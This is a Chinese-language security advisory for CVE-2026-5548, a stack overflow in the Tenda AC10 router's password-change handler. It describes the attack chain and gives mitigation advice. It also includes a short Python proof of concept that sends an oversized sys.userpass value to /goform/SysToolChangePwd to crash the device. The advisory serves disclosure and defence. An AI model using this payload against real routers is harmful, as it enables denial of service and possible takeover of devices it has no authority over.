CVE-2026-5548 CVSS 8.8 高危

CVE-2026-5548 Tenda AC10栈溢出漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5548

漏洞类型

栈溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC10

漏洞概述

Tenda AC10路由器在处理系统工具密码修改请求时存在栈溢出漏洞。攻击者可利用该漏洞，通过精心构造的`sys.userpass`参数远程触发`/bin/httpd`服务崩溃，从而可能导致拒绝服务或在特定条件下执行任意代码。

技术细节

漏洞位于Tenda AC10固件版本16.03.10.10_multi_TDE01的/bin/httpd二进制文件中，具体涉及`fromSysToolChangePwd`函数。该函数在处理用户提交的密码修改请求时，未对`sys.userpass`参数的长度进行有效校验，直接将其拷贝到栈上的固定大小缓冲区。由于该接口可通过网络访问且仅需低权限，攻击者可发送超长数据包覆盖栈上的返回地址，劫持程序控制流，实现远程代码执行或导致设备崩溃。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别Tenda AC10路由器及其固件版本。

STEP 2

2. 发送恶意请求

攻击者向路由器的/goform/SysToolChangePwd接口发送POST请求，并在sys.userpass字段填充超长字符串。

STEP 3

3. 触发溢出

服务器端处理请求时，fromSysToolChangePwd函数因缓冲区溢出覆盖返回地址。

STEP 4

4. 执行攻击

程序流程被重定向，导致设备崩溃（DoS）或执行攻击者注入的恶意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the vulnerable endpoint
target_ip = "192.168.0.1"
url = f"http://{target_ip}/goform/SysToolChangePwd"

# Malicious payload to trigger stack overflow
# Adjust length based on specific buffer size analysis
payload = "A" * 600

data = {
    "sys.userpass": payload
}

try:
    response = requests.post(url, data=data)
    print(f"Status Code: {response.status_code}")
    print("Payload sent, check device for crash or shell.")
except Exception as e:
    print(f"Request failed: {e}")

影响范围

Tenda AC10 16.03.10.10_multi_TDE01

防御指南

临时缓解措施

建议用户立即断开暴露在公网的Tenda AC10路由器管理端口，仅允许可信IP访问，并密切关注官方安全公告，尽快下载并安装固件补丁以修复此漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表